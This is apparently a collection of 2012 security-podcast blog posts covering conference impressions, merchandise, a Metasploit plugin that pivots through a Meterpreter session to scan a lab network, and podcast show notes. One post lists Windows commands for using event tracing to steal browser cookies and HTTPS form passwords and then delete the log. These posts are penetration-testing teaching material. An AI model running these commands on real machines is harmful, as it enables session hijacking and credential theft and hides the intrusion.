This year I'm making just one epic top ten list. After 8 days in the Vegas desert, which included four days of training, two days of Blackhat and three days of Defcon, I learned a lot about a many things, including myself:

There are two things wrong, er right, here, John did do a lot of standing, and he is not Paul. All joking aside, the folks at Blackhat rock and both the training and briefings are extremely well done. Huge thanks to all of the Blackhat staff@

1. It's Not About You - I heard this quote recently, something along the lines of "All quarrels begin with selfishness". I spoke with a lot of people, and the most enjoyable folks to talk to were the ones that truly wanted to give and make the community a better place. The ones that do things because its the right thing to do, and don't expect anything in return. My advice to folks is to fit this into your career somehow, even if its a small slice, everyone will benefit. Of course, Johnny Long and the entire Hackers For Charity crew have made it a huge portion of their mission to help others, which is so awesome. We try to help HFC as much as we can, and so should you!




Tim got bored in class and wrote an application to keep track of team scores for the Offensive Countermeasures reverse CTF (in like his sleep or something, Tim is an AMAZING programmer!). In the "reverse CTF" the teachers hack into student's virtual machines (with permission of course) and the students are encouraged to hack us back.

2. NFC Is Really Neat - Charlie Miller gave a great talk on NFC technologies embedded in a few different model phones. The attacks required that you be in proximity to your victim, however, it underscores just how bad security is on mobile devices.




John is also an amazing instructor. I truly believe that if the entire slide deck were nothing but lolcatz the students would still walk away with tons of knowledge, rate the course really high and talk about how awesome the class was for them.

3. The Community Is Stronger Than Ever - The fact that each year both Blackhat and Defcon seem to grow in number is one indication that we have a great community. It means more people want to be a part of it, which is awesome. However, we have to hold a high standard. Jericho gave a great talk at Blackhat about policing our own, making sure that the community is aware of "false profits" and other such notions. This is important work, and we all need to do our best to support our community and call bullshit when we see it.




It was great hanging out with Ben, make sure you go grab the latest versions of his wireless honeypot called "Claymore".

4. I Love Python - I spent some time with both Ben Jackson and Tim Tomes over the weekend of Blackhat training. While John Strand did the hard work of training, myself, Tim and Ben did some good ol' fashioned "geekin' out". I learned more about Python and made some contributions to Ben's wireless honeypot project. In the end, I love Python (the debugger alone sets it apart from many other languages).




Part of the problem with embedded device security is that the developers don't even LET you try to make it secure. W-T-F Asus!

5. The Loud Minority Will Remain The Minority - This concept I borrowed from the cigar industry. I got talking to some of the folks that are behind making some of the finest cigars in the industry. They all say the same thing, if they listen to the "loud minority" they would be out of business. The hardcore cigar enthusiast wants certain things, specific blends, sizes and shapes of cigars. If they catered to this group, they'd go out of business, while its loud, its still the minority. The security industry has a similar group of people, and while I totally appreciate and respect people's opinions, I try to fit it into the larger picture.




HFC had this really cool rifle wireless hacking thinner. It had every kind of wireless toy on it, including ninja remotes and just about every other toy from deal extreme.

6. There Will Always Be One Porn Star At Defcon - I won't post it here, but I always end up with at least one picture to use in my presentations where at least one person is from the adult film industry. You will just have to wait until one of us presents in the proper setting to see the picture ;)




The largest Blackhat I saw in Vegas.

7. "Hack Naked" Is A Great Filter - When people see the term "Hack Naked", there are a few typical reactions. Having displayed this phrase proudly at Defcon to over 15,000 people, I feel like I can define a few of them. Some just laugh, and that's all they do. They giggle and smile, and then just keep walking, almost like when you see someone with their fly down or toilet paper stuck to their shoe when they come out of the bathroom. Its cute and funny, and that is all. The next group finds it so funny and interesting that they want to be a part of it. They pick up a sticker and buy a shirt and wear it proudly. If you ask them "Why Hack Naked", they'd say "Who cares, that shit is funny". These are the folks we like to hang out with coincidently. The final group are the ones who are offended. I'm not sure if its the idea of someone sitting at a computer naked or the mudflap girl image, but its clear they are offended. Society today is far too easily offended, and if the mere suggestion of someone being naked offends you, get over it, we all came into this world naked. Furtheremore, there are far worse things to promote than being naked. I can't help but think of a quote I read from an interview with Robin Williams who said when faced with the choice of their children seeing violence on TV or a love scene, the choice is clear, let them see the love scene! (And no, I'm not suggesting you let your kids watch porn).




Our "booth babe" got lots of attention, mostly people were frightened by the 6' tall cardboard cutout of Larry, naked, holding only a WRT54G wireless router.

8. Cigars Make Friends - In a way, I kinda felt like King Edward VII of England who, after assuming the throne from mother, Queen Victoria, had previously banned smoking in court stated: "Gentlemen, you may smoke." Its no secret I love to smoke cigars, and it was great to share that with many friends, both old and new.




I smoked a cigar called the "Pussycat", couldn't resist! In the back is one of my new friends, thanks to our shared passion for cigars!

9. We Still Have A Huge Embedded Device Security Problem - I sat in on one of the talks at Blackhat on embedded device hacking. Its still the same story, poor security controls, poor coding, poor security feature implementations (stack has ASLR, but heap overflows still work).




Sharing a room with Dave "The AV guy" when there is a window between the shower and the bedroom, is, well, weird.

10. Our Listeners Rule - Just saying', you all rock. I met so many listeners at both conferences and just wanted to again thank you for listening. We really appreciate your support, and more than ever are committed to sharing knowledge with the community in an entertaining way.

Do you "Hack Naked"? Want to tell the world that you do? Most people ask me "Why Hack Naked?", to which I respond "Why not?". This year at Defcon, and select other conferences such as Derbycon, we will have for sale all brand new "Hack Naked" gear.

All the designs are freshly updated, including some awesome ideas from the PaulDotCom crew (special thanks to Larry Pesce for his creativity and hard work with all the artwork):

Keep Calm and Hack Naked

Here's a sign you're getting old: I didn't get it at first. Then, once Larry explained it to me, it made sense. Now, I see all the "young folks" wearing "keep calm" themed shirts. I wore one of our new shirts when I went to a store, and got two compliments from younger folk working behind the counter. So, check out our latest design available in black and red from sizes M-XXL:

We also are sporting a new "Hack Naked" T-shirt design:

Since we always get the question "What is Hack Naked?" the back on both shirts above looks like this:

We also have brand new ladies sleepwear, in both pink and white lettering. They make a great gift for that special lady, or just to lounge in when you want to feel pretty:

And we are sporting all new Post-Exploitation Clean-up Towels featuring the "Hack Naked" logo, for all of your post-exploitation clean-up needs:

Finally we brought back the giant bumper stickers! These bad boys are 10" x 3":

We will also have toddler Hack Naked shirts (2T, 3T and 4T sizes), baseball jerseys and a very special guest at the table, I guess you could call it a "booth babe".

Come by our table at Defcon for special deals, all shirts will be $10 and you get two shirts for $15 (excluding XXL sizes).

Recently I have been working more and more on my pentest plugin for Metasploit doing bug fixes and trying to improve some of the current areas of it. I added the Auto Exploit plugin to it for exploit automation and added some commands to aid in doing enumeration and discovery thru a pivot.

I was talking with the guys in Defensive Intuition and Black Hills Defensive Security and one of the areas they wanted to see me cover in the plugin was being able to quickly move enumerating and scanning other targets when they got a Meterpreter session on a clients network. So I added 2 commands to help with this to the plugin.

Lets start with a session that is connected to a host that is behind NAT:

msf > sessions

Active sessions
===============

  Id  Type                   Information                            Connection
  --  ----                   -----------                            ----------
  1   meterpreter x86/win32  VICTIMLAB\Administrator @ WIN2K3LAB01  192.168.1.100:4444 -> 192.168.1.138:49323 (10.10.10.2)

msf >

lets start by loading the plugin

msf >  load pentest

       ___         _          _     ___ _           _
      | _ \___ _ _| |_ ___ __| |_  | _ \ |_  _ __ _(_)_ _
      |  _/ -_) ' \  _/ -_|_-<  _| |  _/ | || / _` | | ' \
      |_| \___|_||_\__\___/__/\__| |_| |_|\_,_\__, |_|_||_|
                                              |___/
			
Version 1.2
Pentest plugin loaded.
by Carlos Perez (carlos_perez[at]darkoperator.com)
[*] Successfully loaded plugin: pentest
msf  exploit(handler) > back
msf >

As shown in my others post about the plugin it will add commands to the list of commands available in the console to look at the command available we can just enter the help command or ? :

msf > help
. . . .
Discovery Commands
==================

    Command                 Description
    -------                 -----------
    discover_db             Run discovery modules against current hosts in the database.
    network_discover        Performs a portscan and enumeration of services found for non pivot networks.
    pivot_network_discover  Performs enumeration of networks available to a specified Meterpreter session.
    show_session_networks   Enumerate the networks one could pivot thru Meterpreter in the active sessions.
. . . .

The commands we have available are:

* discover_db - this command will go thru the hosts that are present in the database and will run a set of modules to enumerate and gather information from the services that have been detected on those host. One can provide a range of host to limit the discovery and SMB settings for the SMB modules that will be ran against hosts.

* network_discovery - will run the nmap scanner against a given CIDR, it will determine the ports that are used by Metasploit auxiliary and exploit modules and use those if none are specified and after running the scan it will run additional discovery modules to further enumerate and gather information from those services.

* pivot_network_discover - This command will enumerate all interfaces and routes on a given Windows Meterpreter session, it will create routes to the found networks thru the session specified, it will determine which of the enumerated networks are directly connected to the host or are remote so as to determine the best way to run detection of hosts, it will do a ARP Sweep if the network is directly connected since this provides the most accuracy and if the network is a remote one it will execute a ping scan against it, it will execute if specified a TCP and UDP port scan against the hosts it discovered, if a port list is not provided it will auto generate one from the existing auxiliary and exploit modules currently available in addition to adding some additional common ones, if specified it will launch discovery modules to further enumerate the services found.

* show_session_networks - will list the networks available thru Windows Meterpreter Sessions.

Lets start by listing the networks available thru a session. Lets first look at the options available for the show_session_networks command:

msf > show_session_networks -h
This command will show the networks that can be routed thru a Meterpreter session.

OPTIONS:

    -h        Help Message.
    -s   Sessions to enumerate networks against. Example  or .

Now lets list the networks available:

msf > show_session_networks -s all
Network     Netmask        Session
-------     -------        -------
10.10.10.0  255.255.255.0  1

Now that we know the networks connected to the session we can check the options we have available to the command pivot_network_discover :

msf > pivot_network_discover -h

OPTIONS:

    -D   SMB Domain for discovery(optional).
    -P   SMB Password for discovery(optional).
    -U   SMB Username for discovery(optional).
    -d        Run Framework discovery modules against found hosts.
    -h        Help Message.
    -p   Port list. Provide a comma separated list of port and/or ranges to TCP scan.
    -s   Session to do discovery of networks and hosts.
    -t        Perform TCP port scan of hosts discovered.
    -u        Perform UDP scan of hosts discovered.
    -v        Be verbose and show pending actions.

Lets see what information we have in our current workspace for hosts, services and notes:

msf > hosts

Hosts
=====

address  mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------  ---  ----  -------  ---------  -----  -------  ----  --------

msf > services

Services
========

host  port  proto  name  state  info
----  ----  -----  ----  -----  ----

msf > notes
msf >

Lets run a discovery thru the current session we have:

 msf > pivot_network_discover -t -u -d -s 1
[*] Identifying networks to discover
[*] Routing new subnet 10.10.10.0/255.255.255.0 through session 1
[*] Running windows/gather/arp_scanner against 1

[*] Running module against WIN2K3LAB01
[*] ARP Scanning 10.10.10.0/24
[*] 	IP: 10.10.10.2 MAC 00:0c:29:5e:e3:bd
[*] 	IP: 10.10.10.1 MAC 00:0c:29:4d:e7:5a
[*] 	IP: 10.10.10.200 MAC 00:0c:29:45:73:cb
[*] 	IP: 10.10.10.201 MAC 00:0c:29:c9:15:98
[*] 	IP: 10.10.10.239 MAC 00:0c:29:1e:8d:30
[*] 	IP: 10.10.10.238 MAC 00:0c:29:10:5c:d7
[*] 	IP: 10.10.10.243 MAC 00:0c:29:2e:97:ff
[*] Generating list of ports used by Auxiliary Modules
[*] Generating list of ports used by Exploit Modules
[*] Discovering 10.10.10.0/24 Network
[+] Running TCP Portscan against 10.10.10.2
[+] Running TCP Portscan against 10.10.10.1
[+] Running TCP Portscan against 10.10.10.200
[+] Running TCP Portscan against 10.10.10.201
[+] Running TCP Portscan against 10.10.10.239
[+] Running TCP Portscan against 10.10.10.238
[+] Running TCP Portscan against 10.10.10.243
[+] Running UDP Portscan against 10.10.10.2
[+] Running UDP Portscan against 10.10.10.1
[+] Running UDP Portscan against 10.10.10.200
[*] 10.10.10.1:80 - TCP OPEN
[*] 10.10.10.243:514 - TCP OPEN
[*] 10.10.10.2:445 - TCP OPEN
[*] 10.10.10.243:111 - TCP OPEN
[*] 10.10.10.243:445 - TCP OPEN
[*] 10.10.10.239:23 - TCP OPEN
[*] 10.10.10.243:23 - TCP OPEN
[*] 10.10.10.243:21 - TCP OPEN
[*] 10.10.10.2:135 - TCP OPEN
[*] 10.10.10.243:1099 - TCP OPEN
[*] 10.10.10.243:80 - TCP OPEN
[*] 10.10.10.243:22 - TCP OPEN
[*] 10.10.10.243:513 - TCP OPEN
[*] 10.10.10.2:389 - TCP OPEN
[*] 10.10.10.239:135 - TCP OPEN
[*] 10.10.10.243:25 - TCP OPEN
[*] 10.10.10.201:135 - TCP OPEN
[*] 10.10.10.200:445 - TCP OPEN
[*] 10.10.10.200:135 - TCP OPEN
[*] 10.10.10.243:512 - TCP OPEN
[*] 10.10.10.239:445 - TCP OPEN
[*] 10.10.10.238:445 - TCP OPEN
[*] 10.10.10.238:135 - TCP OPEN
[*] Discovered NTP on 10.10.10.2:123 (1c0104fa00000000000a0da14c4f434cd3b1d5bebfd032b2c54f234b71b152f3d3b1e271bbb79f3ed3b1e271bbb79f3e)
[*] Discovered DNS on 10.10.10.1:53 (403e858000010001000000000756455253494f4e0442494e440000100003c00c0010000300000000000d0c646e736d6173712d322e3435)
[*] Discovered NetBIOS on 10.10.10.200:137 (WINXPLAB01::U :VICTIMLAB::G :WINXPLAB01::U :VICTIMLAB::G :00:0c:29:45:73:cb)

. . . .

[*] Scanned 1 of 1 hosts (100% complete)
[*] 10.10.10.243:23 TELNET _                  _       _ _        _     _      ____  \x0a _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ \x0a| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |\x0a| | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/ \x0a|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|\x0a                            |_|                                          \x0a\x0a\x0aWarning: Never expose this VM to an untrusted network!\x0a\x0aContact: msfdev[at]metasploit.com\x0a\x0aLogin with msfadmin/msfadmin to get started\x0a\x0a\x0ametasploitable login:
[*] Scanned 1 of 1 hosts (100% complete)
[-] File doesn't seem to exist. The upload probably failed.
[*] Scanned 1 of 1 hosts (100% complete)
[*] 10.10.10.243 (Apache/2.2.8 (Ubuntu) DAV/2) WebDAV disabled.
[*] Scanned 1 of 1 hosts (100% complete)
[*] 10.10.10.243:80 Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )
[*] Scanned 1 of 1 hosts (100% complete)
[*] Scanned 1 of 1 hosts (100% complete)
[*] waiting for some modules to finish
msf >
[*] 10.10.10.243:3306 is running MySQL 5.0.51a-3ubuntu5 (protocol 10)
[*] 10.10.10.243:5900, VNC server protocol version : 3.3
[*] Scanned 1 of 1 hosts (100% complete)
[*] Scanned 1 of 1 hosts (100% complete)
[*] 10.10.10.243:5900, VNC server security types supported : VNC
[*] Scanned 1 of 1 hosts (100% complete)
[*] 10.10.10.243:5432 Postgres - Version 8.3.8 (Pre-Auth)
[*] Scanned 1 of 1 hosts (100% complete)
[*] 10.10.10.239:23 Does not support encryption: Welcome to Microsoft Telnet Service \x0a\x0a\x0dlogin:
[*] Scanned 1 of 1 hosts (100% complete)
[*] 10.10.10.243:23 Does not support encryption: _                  _       _ _        _     _      ____  \x0a _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ \x0a| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |\x0a| | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/ \x0a|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|\x0a                            |_|                                          \x0a\x0a\x0aWarning: Never expose this VM to an untrusted network!\x0a\x0aContact: msfdev[at]metasploit.com\x0a\x0aLogin with msfadmin/msfadmin to get started\x0a\x0a\x0ametasploitable login:
[*] Scanned 1 of 1 hosts (100% complete)

msf >

One thing that we have to keep in mind scanning thru a pivot is slow, that is why I decided to go with the list of generated ports since these will provide me the best chances to leverage the tools and modules in the framework. For large networks I recommend also using the -v option to see how many scanner jobs are pending.

Now that we finished the discovery lets look at the hosts, services and notes we now have:

msf > hosts

Hosts
=====

address       mac                name             os_name            os_flavor        os_sp  purpose  info  comments
-------       ---                ----             -------            ---------        -----  -------  ----  --------
10.10.10.1    00:0c:29:4d:e7:5a  10.10.10.1       Unknown                                    device
10.10.10.2    00:0c:29:5e:e3:bd  win2k3lab01      Microsoft Windows  2003             SP2    server
10.10.10.200  00:0c:29:45:73:cb  winxplab01       Microsoft Windows  XP               SP2    client
10.10.10.201  00:0c:29:c9:15:98                   Unknown                                    device
10.10.10.238  00:0c:29:10:5c:d7  win-yr4v852v71y  Microsoft Windows  2008 Enterprise  SP1    server
10.10.10.239  00:0c:29:1e:8d:30  test-01bcdaf47c  Microsoft Windows  XP               SP2    client
10.10.10.243  00:0c:29:2e:97:ff  metasploitable   Linux              Debian                  server

msf > services

Services
========

host          port   proto  name      state  info
----          ----   -----  ----      -----  ----
10.10.10.1    53     udp    dns       open   403e858000010001000000000756455253494f4e0442494e440000100003c00c0010000300000000000d0c646e736d6173712d322e3435
10.10.10.1    80     tcp    http      open   lighttpd/1.4.23
10.10.10.2    135    tcp              open
10.10.10.2    123    udp    ntp       open   1c0104fa00000000000a0da14c4f434cd3b1d5bebfd032b2c54f234b71b152f3d3b1e271bbb79f3ed3b1e271bbb79f3e
10.10.10.2    53     udp    dns       open   Microsoft DNS
10.10.10.2    137    udp    netbios   open   WIN2K3LAB01::U :VICTIMLAB::G :VICTIMLAB::G :WIN2K3LAB01::U :VICTIMLAB::U :VICTIMLAB::G :VICTIMLAB::U :__MSBROWSE__::G :00:0c:29:5e:e3:bd
10.10.10.2    3389   tcp              open
10.10.10.2    445    tcp    smb       open   Windows 2003 Service Pack 2 (language: Unknown) (name:WIN2K3LAB01) (domain:VICTIMLAB)
10.10.10.2    389    tcp              open
10.10.10.200  123    udp    ntp       open   1c020efa00000000001000000a0a0a02d3b17b6e0454d46dc54f234b71b152f3d3b1e2508240cefdd3b1e2508240cefd
10.10.10.200  135    tcp              open
10.10.10.200  3389   tcp              open
10.10.10.200  445    tcp    smb       open   Windows XP Service Pack 2 (language: English) (name:WINXPLAB01) (domain:VICTIMLAB)
10.10.10.200  137    udp    netbios   open   WINXPLAB01::U :VICTIMLAB::G :WINXPLAB01::U :VICTIMLAB::G :00:0c:29:45:73:cb
10.10.10.201  135    tcp              open
10.10.10.238  137    udp    netbios   open   WIN-YR4V852V71Y::U :WORKGROUP::G :WIN-YR4V852V71Y::U :00:0c:29:10:5c:d7
10.10.10.238  135    tcp              open
10.10.10.238  445    tcp    smb       open   Windows 2008 Enterprise Service Pack 1 (language: Unknown) (name:WIN-YR4V852V71Y) (domain:WORKGROUP)
10.10.10.239  23     tcp    telnet    open   Welcome to Microsoft Telnet Service \x0a\x0a\x0dlogin:
10.10.10.239  123    udp    ntp       open   Microsoft NTP
10.10.10.239  135    tcp              open
10.10.10.239  137    udp    netbios   open   TEST-01BCDAF47C::U :WORKGROUP::G :TEST-01BCDAF47C::U :WORKGROUP::G :WORKGROUP::U :__MSBROWSE__::G :00:0c:29:1e:8d:30
10.10.10.239  445    tcp    smb       open   Windows XP Service Pack 2 (language: English) (name:TEST-01BCDAF47C) (domain:WORKGROUP)
10.10.10.243  80     tcp    http      open   Apache/2.2.8 (Ubuntu) DAV/2 ( Powered by PHP/5.2.4-2ubuntu5.10 )
10.10.10.243  22     tcp    ssh       open   SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
10.10.10.243  23     tcp    telnet    open   _                  _       _ _        _     _      ____  \x0a _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ \x0a| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |\x0a| | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/ \x0a|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|\x0a                            |_|                                          \x0a\x0a\x0aWarning: Never expose this VM to an untrusted network!\x0a\x0aContact: msfdev[at]metasploit.com\x0a\x0aLogin with msfadmin/msfadmin to get started\x0a\x0a\x0ametasploitable login:
10.10.10.243  25     tcp    smtp      open   220 metasploitable.localdomain ESMTP Postfix (Ubuntu)

10.10.10.243  21     tcp    ftp       open   220 (vsFTPd 2.3.4)\x0d\x0a
10.10.10.243  111    udp    portmap   open   100000 v2 TCP(111), 100000 v2 UDP(111), 100024 v1 UDP(55600), 100024 v1 TCP(53257), 100003 v2 UDP(2049), 100003 v3 UDP(2049), 100003 v4 UDP(2049), 100021 v1 UDP(58825), 100021 v3 UDP(58825), 100021 v4 UDP(58825), 100003 v2 TCP(2049), 100003 v3 TCP(2049), 100003 v4 TCP(2049), 100021 v1 TCP(47361), 100021 v3 TCP(47361), 100021 v4 TCP(47361), 100005 v1 UDP(40587), 100005 v1 TCP(42089), 100005 v2 UDP(40587), 100005 v2 TCP(42089), 100005 v3 UDP(40587), 100005 v3 TCP(42089)
10.10.10.243  111    tcp    sunrpc    open   100000 v2
10.10.10.243  137    udp    netbios   open   METASPLOITABLE::U :METASPLOITABLE::U :METASPLOITABLE::U :WORKGROUP::G :WORKGROUP::G :00:00:00:00:00:00
10.10.10.243  139    tcp              open
10.10.10.243  445    tcp    smb       open   Unix Samba 3.0.20-Debian (language: Unknown) (domain:WORKGROUP)
10.10.10.243  512    tcp              open
10.10.10.243  513    tcp              open
10.10.10.243  514    tcp              open
10.10.10.243  1099   tcp              open
10.10.10.243  1524   tcp              open
10.10.10.243  2049   udp    sunrpc    open   100003 v4
10.10.10.243  2049   tcp    sunrpc    open   100003 v4
10.10.10.243  3306   tcp    mysql     open   5.0.51a-3ubuntu5
10.10.10.243  3632   tcp              open
10.10.10.243  5432   tcp    postgres  open   8.3.8
10.10.10.243  5900   tcp    vnc       open   VNC protocol version 3.3
10.10.10.243  6000   tcp              open
10.10.10.243  6667   tcp              open
10.10.10.243  6697   tcp              open
10.10.10.243  8180   tcp              open
10.10.10.243  8787   tcp              open
10.10.10.243  40587  udp    sunrpc    open   100005 v3
10.10.10.243  42089  tcp    sunrpc    open   100005 v3
10.10.10.243  47361  tcp    sunrpc    open   100021 v4
10.10.10.243  53257  tcp    sunrpc    open   100024 v1
10.10.10.243  55600  udp    sunrpc    open   100024 v1
10.10.10.243  58825  udp    sunrpc    open   100021 v4

msf > notes
[*] Time: 2012-07-19 01:35:46 UTC Note: host=10.10.10.2 type=host.virtual_machine data={:vendor=>"VMWare", :method=>"netbios"}
[*] Time: 2012-07-19 01:35:47 UTC Note: host=10.10.10.200 service=smb type=smb.fingerprint data={:os_flavor=>"Windows XP", :os_name=>"Microsoft Windows", :os_sp=>"Service Pack 2", :os_lang=>"English"}
[*] Time: 2012-07-19 01:36:03 UTC Note: host=10.10.10.239 service=smb type=smb.fingerprint data={:os_flavor=>"Windows XP", :os_name=>"Microsoft Windows", :os_sp=>"Service Pack 2", :os_lang=>"English"}
[*] Time: 2012-07-19 01:36:05 UTC Note: host=10.10.10.200 type=host.virtual_machine data={:vendor=>"VMWare", :method=>"netbios"}
[*] Time: 2012-07-19 01:36:16 UTC Note: host=10.10.10.238 service=smb type=smb.fingerprint data={:os_flavor=>"Windows 2008 Enterprise", :os_name=>"Microsoft Windows", :os_sp=>"Service Pack 1", :os_lang=>"Unknown"}
[*] Time: 2012-07-19 01:36:22 UTC Note: host=10.10.10.239 type=host.virtual_machine data={:vendor=>"VMWare", :method=>"netbios"}
[*] Time: 2012-07-19 01:36:28 UTC Note: host=10.10.10.243 service=smb type=smb.fingerprint data={:os_flavor=>"Unix", :os_name=>"Unknown", :os_sp=>"Samba 3.0.20-Debian"}
[*] Time: 2012-07-19 01:36:33 UTC Note: host=10.10.10.238 type=host.virtual_machine data={:vendor=>"VMWare", :method=>"netbios"}
[*] Time: 2012-07-19 01:36:34 UTC Note: host=10.10.10.243 service=139/tcp type=smb.domain.enumusers data={:sid_txt=>"5-21-1042354039-2475377354-766472396", :pass_min=>5, :pass_min_history=>0, :server_role=>3, :lockout_threshold=>0, :lockout_duration=>1480786430454, :lockout_window=>1480786430454, :users=>{1010=>"games", 501=>"nobody", 1210=>"bind", 1026=>"proxy", 1204=>"syslog", 3002=>"user", 1066=>"www-data", 1000=>"root", 1018=>"news", 1216=>"postgres", 1004=>"bin", 1016=>"mail", 1222=>"distccd", 1226=>"proftpd", 1202=>"dhcp", 1002=>"daemon", 1208=>"sshd", 1012=>"man", 1014=>"lp", 1218=>"mysql", 1082=>"gnats", 1200=>"libuuid", 1068=>"backup", 3000=>"msfadmin", 1224=>"telnetd", 1006=>"sys", 1206=>"klog", 1212=>"postfix", 3004=>"service", 1076=>"list", 1078=>"irc", 1214=>"ftp", 1220=>"tomcat55", 1008=>"sync", 1020=>"uucp"}, :name=>"METASPLOITABLE"}
[*] Time: 2012-07-19 01:36:36 UTC Note: host=10.10.10.243 service=139/tcp type=smb.shares data={:shares=>[["print$", "DISK", "Printer Drivers"], ["tmp", "DISK", "oh noes!"], ["opt", "DISK", ""], ["IPC$", "IPC", "IPC Service (metasploitable server (Samba 3.0.20-Debian))"], ["ADMIN$", "IPC", "IPC Service (metasploitable server (Samba 3.0.20-Debian))"]]}
[*] Time: 2012-07-19 01:35:33 UTC Note: host=10.10.10.2 service=smb type=smb.fingerprint data={:os_flavor=>"Windows 2003", :os_name=>"Microsoft Windows", :os_sp=>"Service Pack 2", :os_lang=>"Unknown"}

I hope you find these new commands useful.

ETW (Event Tracing for Windows) is pretty awesome. You can do all kinds of crazy cool stuff with it. For example, imagine you've just exploited your target to find the CFO is using IE to browse to the companies internal ERP (Enterprise Resource Planning) system. Showing the executives that you've got access to the financials is a great way to demonstrate risk in terms that are understood in mahogany row. You need to steal his cookie, but it is non-persistent (memory only... not on disk), the session is SSL encrypted and it was negotiated before you got on his machine. Windows Event Tracing to the rescue. First you turn on Event tracing for the WinInet process.

cd \temp
logman start CookieStealer -p Microsoft-Windows-WinInet -o cookiesteal.etl -ets

Then you let you target do a little web browsing and wait for the good to show up in your new "cookiesteal.etl" event log.

After a few minutes you grab the goods!!

wevtutil qe c:\temp\cookiesteal.etl /lf:true /f:Text | find /i "cookie added"

And it isn't just cookies recorded in the event logs. You can capture all the POST information that is passed back and forth including password from FORM based HTTPS sites!

wevtutil qe c:\temp\cookiesteal.etl /lf:true /f:Text | find /i "POST"

Or you could do some additional reconnaissance by looking at DNS requests, Proxy information, DNS Cache snooping and more.

wevtutil qe c:\temp\cookiesteal.etl /lf:true /f:Text | find /i "hostname"
wevtutil qe c:\temp\cookiesteal.etl /lf:true /f:Text | find /i "WPAD"
wevtutil qe c:\temp\cookiesteal.etl /lf:true /f:Text | find /i "DNS Cache"

When your done you you simply turn off your Event logging and delete your event log.

logman stop CookieStealer -ets
del cookiesteal.etl

Have fun.

Join me for SANS 504 Hacker Techniques, Exploits & Incident Handling November 27th - December 2nd 2012 in lovely San Antonio Texas.

Mark Baggett
On Twitter  @markbaggett

So says Santa, 10 things that are not tricks or ingenious and more!

Security News Stories - Episode 296 Show Notes

Episode 296 (mp3)

Tune in to PaulDotCom Security Weekly TV, Hack Naked TV, and Hack Naked At Night episodes on our YouTube Channel or our Bliptv channel.

Ben and Lawrence joins us to talk shop, tell us what its like to be pen testers in the UK, tips, tricks and more!:

Episode 296 Show Notes

Episode 296 (mp3)

Tune in to PaulDotCom Security Weekly TV, Hack Naked TV, and Hack Naked At Night episodes on our YouTube Channel or our Bliptv channel.

Ben Jackson wrote some awesome Python scripts to setup a wireless honeypot. He comes on the show to give us a technical tutorial:

Wireless Honeypot Using Python - Episode 296 Show Notes

Episode 296 (mp3)

Tune in to PaulDotCom Security Weekly TV, Hack Naked TV, and Hack Naked At Night episodes on our YouTube Channel or our Bliptv channel.

In this episode we discuss the Yahoo Password Breach. We talk about SET and finally we talk about the iTunes App store get stuff for free attack type thinginy... Links for this episode:

Yahoo clear-text password leak

iTunes App store hack

Cross Platform Dropper Links to cool stuff our awesome sponsors are providing: CloudPassage offers a free Basic version of Halo that includes extensive cloud security features, such as host-based firewalls, vulnerability management, security event alerting, server account management and intrusion detection. Halo works with any cloud provider and makes server security portable across environments. The convenient Halo portal allows you to manage all your security from one screen, whether it's in public, private or hybrid clouds – even traditional data centers. Check it out here Manage your Big Data with the most scalable log & security intelligence platform for the Enterprise & Cloud.Don’t take our word. Try it for yourself! For a limited time, download here

Video Feeds:

In this episode we discuss the Yahoo Password Breach. We talk about SET and finally we talk about the iTunes App store get stuff for free attack type thinginy...

Links for this episode:

Yahoo clear-text password leak

iTunes App store hack

Cross Platform Dropper

Links to cool stuff our awesome sponsors are providing:

CloudPassage offers a free Basic version of Halo that includes extensive cloud security features, such as host-based firewalls, vulnerability management, security event alerting, server account management and intrusion detection. Halo works with any cloud provider and makes server security portable across environments. The convenient Halo portal allows you to manage all your security from one screen, whether it's in public, private or hybrid clouds - even traditional data centers.

Check it out here

Manage your Big Data with the most scalable log & security intelligence platform for the Enterprise & Cloud.Don't take our word. Try it for yourself! For a limited time, download here

Video Feeds:

Hey Everyone, been a long time since I have published but I am back and living here in the south west. I have got some cool stuff utilizing the latest BackTrack 5r2.

Have you ever used the Metasploit GUI Armitage? If you are like me, you use the command line. I gotta say though, this GUI is pretty cool, and makes for nice presentation material. Well check it out, I did it using the latest ms12-004 hack. You will need the ability to play .m4v files to view it though.

This one won't auto play you have to right mouse click on the link and "Save As" ... ENJOY

Armitage-Metasploit

Be Good, Be Safe, If you are going to hack, hack legally and responsibly ---I'm Out

~Mark Bennett

Recently I was chatting with my good friend Elliot Cutright also known in twitter as @nullthreat about the recent changes I have been doing to DNSRecon and several of the improvements. He commented that he would miss the MDNS enumeration feature I had on it originally. Do to my move of supporting Python 3.x and supporting Python 2.x and above for the tool I had to drop that feature in addition that library I used for it was abandoned by the author for quite some time. MDNS is a great way to find all sorts of information about hosts in your same subnet specially since the MDSN records act as regular DNS SRV records where we get Service name that most times include the protocol and name, Target for the service, Port and a text field with additional information. In addition to this one can resolve the hosts to their IPv4 and IPv6 addresses.

Based on the request I wrote a Ruby script that leveraged the tool avahi-browser and set as my goals for the script:

• Detect most of the supported MDNS Records in the local subnet the attacker is connected on.
• Do not resolve those services running on the attackers machine.
• Make sure that the out put was useful and easy to parse and manipulate for a tester.

The resulting script I called MDNSRecon and can be downloaded from my GitHub account at https://github.com/darkoperator/MDNSRecon 

root@bt:~# ./mdnsrecon.rb -h
